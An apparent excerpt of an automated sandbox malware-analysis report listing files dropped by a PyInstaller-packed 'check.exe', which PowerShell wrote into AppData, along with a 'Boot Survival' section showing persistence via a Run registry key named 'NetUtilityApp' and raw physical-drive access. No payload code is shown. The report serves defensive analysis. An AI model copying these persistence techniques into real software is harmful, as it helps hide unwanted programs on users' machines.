Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\opengl32sw.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\charset_normalizer\md__mypyc.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\python313.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Qml.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qwbmp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\MSVCP140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\MSVCP140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\python3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Svg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\_ctypes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Network.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\QtCore.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\libEGL.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\platforms\qwindows.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qsvg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qtga.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qsvg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\_ctypes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5Quick.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\MSVCP140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platforms\qoffscreen.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\libffi-8.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\libffi-8.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qjpeg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\sip.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5Network.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\python313.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\libssl-3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qwebp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\_wmi.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5WebSockets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\MSVCP140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\MSVCP140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5Widgets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qicns.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qico.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\libssl-3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qtga.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\_queue.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5Qml.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\libGLESv2.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\QtWidgets.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\opengl32sw.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\select.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\sip.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\python313.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Quick.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\QtGui.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qjpeg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\platforms\qoffscreen.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qicns.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\python3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\_ctypes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Widgets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5WebSockets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qtiff.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\select.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qtiff.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5DBus.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5Network.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5Svg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\libssl-3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qicns.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\libEGL.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\QtCore.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\libffi-8.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\_wmi.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\charset_normalizer\md.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qwebp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qico.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\charset_normalizer\md.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qtga.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platforms\qminimal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5DBus.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\_queue.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qsvg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\iconengines\qsvgicon.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\_queue.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Core.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qtiff.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5Quick.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5Widgets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\platforms\qminimal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Gui.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5Qml.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5Core.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\platforms\qwebgl.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qgif.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\QtGui.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\libGLESv2.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platforms\qwindows.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\libcrypto-3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qwbmp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qgif.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5WebSockets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\select.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\libEGL.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\QtGui.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\charset_normalizer\md.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\iconengines\qsvgicon.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5Gui.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qwebp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\iconengines\qsvgicon.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5Svg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qjpeg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\QtWidgets.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\python3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\platforms\qminimal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5QmlModels.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\MSVCP140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5DBus.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\_wmi.pydJump to dropped file

Boot Survival

barindex
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle, \\.\PhysicalDrive%d16_2_00007FFB9DD62B00
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle, PhysicalDrive%i16_2_00007FFB9DD62B00
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle, DeviceIoControl -> ERROR_INVALID_FUNCTION; ignore PhysicalDrive%i16_2_00007FFB9DD62B00
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle, DeviceIoControl -> ERROR_NOT_SUPPORTED; ignore PhysicalDrive%i16_2_00007FFB9DD62B00
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD68B10 PyArg_ParseTuple,StartServiceA,CloseServiceHandle,CloseServiceHandle,_Py_NoneStruct,_Py_NoneStruct,16_2_00007FFB9DD68B10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityAppJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityAppJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
